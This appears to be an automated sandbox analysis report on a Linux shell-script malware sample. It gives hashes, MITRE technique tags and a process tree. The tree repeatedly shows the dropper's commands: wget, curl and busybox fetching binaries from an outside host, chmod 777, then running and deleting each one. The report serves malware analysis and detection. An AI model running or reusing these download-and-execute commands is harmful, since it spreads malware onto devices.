ea6218dddd55f83c7a5ebd320b1a0f5a31a7ca34ae8b5cb1f46ce333442e7c2d

Analysis

max time kernel
75s
max time network
76s
platform
debian-9_mips
resource
debian9-mipsbe-20240729-en
resource tags

arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
21-11-2024 08:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ea6218dddd55f83c7a5ebd320b1a0f5a31a7ca34ae8b5cb1f46ce333442e7c2d.sh
Size

10KB
MD5

5043473f1d1be685c2c3cd5616d93b8b
SHA1

24aa735b4efb07ddf576d7af72a4cc3acbdf3d90
SHA256

ea6218dddd55f83c7a5ebd320b1a0f5a31a7ca34ae8b5cb1f46ce333442e7c2d
SHA512

b59ae01412c9c4828947586654be13f48fb5cda3a2ff42c57fe636520260f3f8f5975bdbe4b4883cfed3c1014cf2b4d73cf196deafe7accc98e9a341adb4f23b
SSDEEP

192:4hja2joogwd9ovzbVksHC+OZ2qZEEidvKa2joozCd9ovz1ksHC+W2qZEEx:A0TMiX

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	process
905	chmod
763	chmod
853	chmod
933	chmod
743	chmod
912	chmod
940	chmod
975	chmod
989	chmod
1003	chmod
809	chmod
860	chmod
919	chmod
968	chmod
802	chmod
926	chmod
870	chmod
891	chmod
982	chmod
1010	chmod
877	chmod
884	chmod
954	chmod
961	chmod
996	chmod
846	chmod
898	chmod
947	chmod

Executes dropped EXE 28 IoCs

Processes:

tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoee8NickSVHHGc0CKiNoIeQQeLHFwsfykCoztEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9NeEfuuLaOesxwARQirEHUr8hwbo6uUPtCmWoUgB7802yL8EGGk7pLs8LQPIEsBTddncmWwnZK2byWknzW1gXWixRxIyczawUsL7rR9c8zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZUqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdOJXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ7xcf066zx6JjlSH0geP2dCyq8I4938BMoGxlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4aGHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4acayWFU8o0VGt74yfWT1bYNSzBkMqiwstoetQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Nee8NickSVHHGc0CKiNoIeQQeLHFwsfykCozJXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ7xcf066zx6JjlSH0geP2dCyq8I4938BMoGEfuuLaOesxwARQirEHUr8hwbo6uUPtCmWoUgB7802yL8EGGk7pLs8LQPIEsBTddncmWwnZK2byWknzW1gXWixRxIyczawUsL7rR9c8zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZUqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 64 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

Processes:

busyboxwgetcurlwgetbusyboxcurlbusyboxcurlcurlcurlcurlwgetcurlcurlbusyboxwgetbusyboxbusyboxwgetcurlcurlbusyboxwgetwgetwgetbusyboxcurlwgetwgetcurlwgetwgetcurlcurlwgetcurlwgetwgetcurlbusyboxbusyboxbusyboxcurlcurlcurlbusyboxbusyboxbusyboxwgetbusyboxcurlwgetwgetcurlcurlwgetwgetwgetbusyboxbusyboxbusyboxbusyboxwgetbusybox

pid	process
845	busybox
873	wget
951	curl
999	wget
1009	busybox
867	curl
876	busybox
909	curl
972	curl
986	curl
895	curl
901	wget
888	curl
979	curl
995	busybox
1006	wget
759	busybox
801	busybox
866	wget
874	curl
923	curl
883	busybox
936	wget
957	wget
964	wget
890	busybox
916	curl
922	wget
950	wget
835	curl
880	wget
908	wget
930	curl
937	curl
985	wget
747	curl
849	wget
856	wget
881	curl
953	busybox
981	busybox
988	busybox
993	curl
784	curl
806	curl
808	busybox
925	busybox
932	busybox
929	wget
939	busybox
958	curl
746	wget
805	wget
850	curl
857	curl
915	wget
769	wget
812	wget
918	busybox
960	busybox
1002	busybox
859	busybox
887	wget
897	busybox

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc	curl
File opened for modification	/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw	curl
File opened for modification	/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz	curl
File opened for modification	/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne	curl
File opened for modification	/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ	curl
File opened for modification	/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo	curl
File opened for modification	/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO	curl
File opened for modification	/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG	curl
File opened for modification	/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo	curl
File opened for modification	/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a	curl
File opened for modification	/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a	curl
File opened for modification	/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0	curl
File opened for modification	/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe	curl
File opened for modification	/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne	curl
File opened for modification	/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ	curl
File opened for modification	/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO	curl
File opened for modification	/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw	curl
File opened for modification	/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6	curl
File opened for modification	/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8	curl
File opened for modification	/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6	curl
File opened for modification	/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc	curl
File opened for modification	/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe	curl
File opened for modification	/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz	curl
File opened for modification	/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ	curl
File opened for modification	/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0	curl
File opened for modification	/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ	curl
File opened for modification	/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG	curl
File opened for modification	/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8	curl

/tmp/ea6218dddd55f83c7a5ebd320b1a0f5a31a7ca34ae8b5cb1f46ce333442e7c2d.sh
/tmp/ea6218dddd55f83c7a5ebd320b1a0f5a31a7ca34ae8b5cb1f46ce333442e7c2d.sh
1⤵
PID:710
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:715
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  PID:718
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:733
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  PID:742
- /bin/chmod
  chmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  - File and Directory Permissions Modification
  PID:743
- /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  ./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  - Executes dropped EXE
  PID:744
- /bin/rm
  rm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  PID:745
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - System Network Configuration Discovery
  PID:746
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:747
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - System Network Configuration Discovery
  PID:759
- /bin/chmod
  chmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - File and Directory Permissions Modification
  PID:763
- /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  ./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - Executes dropped EXE
  PID:765
- /bin/rm
  rm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  PID:768
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - System Network Configuration Discovery
  PID:769
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:784
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - System Network Configuration Discovery
  PID:801
- /bin/chmod
  chmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - File and Directory Permissions Modification
  PID:802
- /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  ./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  - Executes dropped EXE
  PID:803
- /bin/rm
  rm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
  2⤵
  PID:804
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - System Network Configuration Discovery
  PID:805
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:806
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - System Network Configuration Discovery
  PID:808
- /bin/chmod
  chmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - File and Directory Permissions Modification
  PID:809
- /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  ./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  - Executes dropped EXE
  PID:810
- /bin/rm
  rm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
  2⤵
  PID:811
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - System Network Configuration Discovery
  PID:812
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:835
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - System Network Configuration Discovery
  PID:845
- /bin/chmod
  chmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - File and Directory Permissions Modification
  PID:846
- /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  ./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  - Executes dropped EXE
  PID:847
- /bin/rm
  rm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
  2⤵
  PID:848
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - System Network Configuration Discovery
  PID:849
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:850
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  PID:852
- /bin/chmod
  chmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - File and Directory Permissions Modification
  PID:853
- /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  ./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - Executes dropped EXE
  PID:854
- /bin/rm
  rm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  PID:855
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - System Network Configuration Discovery
  PID:856
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:857
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - System Network Configuration Discovery
  PID:859
- /bin/chmod
  chmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - File and Directory Permissions Modification
  PID:860
- /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  ./nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - Executes dropped EXE
  PID:861
- /bin/rm
  rm nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  PID:862
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - System Network Configuration Discovery
  PID:866
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:867
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  PID:869
- /bin/chmod
  chmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - File and Directory Permissions Modification
  PID:870
- /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  ./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - Executes dropped EXE
  PID:871
- /bin/rm
  rm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  PID:872
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - System Network Configuration Discovery
  PID:873
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:874
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - System Network Configuration Discovery
  PID:876
- /bin/chmod
  chmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - File and Directory Permissions Modification
  PID:877
- /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  ./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - Executes dropped EXE
  PID:878
- /bin/rm
  rm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  PID:879
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - System Network Configuration Discovery
  PID:880
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:881
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - System Network Configuration Discovery
  PID:883
- /bin/chmod
  chmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - File and Directory Permissions Modification
  PID:884
- /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  ./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  - Executes dropped EXE
  PID:885
- /bin/rm
  rm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
  2⤵
  PID:886
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - System Network Configuration Discovery
  PID:887
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:888
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - System Network Configuration Discovery
  PID:890
- /bin/chmod
  chmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - File and Directory Permissions Modification
  PID:891
- /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  ./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  - Executes dropped EXE
  PID:892
- /bin/rm
  rm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
  2⤵
  PID:893
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  PID:894
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:895
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - System Network Configuration Discovery
  PID:897
- /bin/chmod
  chmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - File and Directory Permissions Modification
  PID:898
- /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  ./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - Executes dropped EXE
  PID:899
- /bin/rm
  rm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  PID:900
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - System Network Configuration Discovery
  PID:901
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:902
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  PID:904
- /bin/chmod
  chmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - File and Directory Permissions Modification
  PID:905
- /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  ./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - Executes dropped EXE
  PID:906
- /bin/rm
  rm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  PID:907
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  - System Network Configuration Discovery
  PID:908
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:909
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  PID:911
- /bin/chmod
  chmod 777 GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  - File and Directory Permissions Modification
  PID:912
- /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  ./GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  - Executes dropped EXE
  PID:913
- /bin/rm
  rm GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  PID:914
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  - System Network Configuration Discovery
  PID:915
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:916
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  - System Network Configuration Discovery
  PID:918
- /bin/chmod
  chmod 777 GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  - File and Directory Permissions Modification
  PID:919
- /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  ./GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  - Executes dropped EXE
  PID:920
- /bin/rm
  rm GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
  2⤵
  PID:921
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - System Network Configuration Discovery
  PID:922
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:923
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - System Network Configuration Discovery
  PID:925
- /bin/chmod
  chmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - File and Directory Permissions Modification
  PID:926
- /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  ./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  - Executes dropped EXE
  PID:927
- /bin/rm
  rm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
  2⤵
  PID:928
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - System Network Configuration Discovery
  PID:929
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:930
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - System Network Configuration Discovery
  PID:932
- /bin/chmod
  chmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - File and Directory Permissions Modification
  PID:933
- /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  ./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  - Executes dropped EXE
  PID:934
- /bin/rm
  rm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
  2⤵
  PID:935
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - System Network Configuration Discovery
  PID:936
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:937
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - System Network Configuration Discovery
  PID:939
- /bin/chmod
  chmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - File and Directory Permissions Modification
  PID:940
- /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  ./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  - Executes dropped EXE
  PID:941
- /bin/rm
  rm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
  2⤵
  PID:942
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  PID:943
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:944
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  PID:946
- /bin/chmod
  chmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  - File and Directory Permissions Modification
  PID:947
- /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  ./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  - Executes dropped EXE
  PID:948
- /bin/rm
  rm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
  2⤵
  PID:949
- /usr/bin/wget
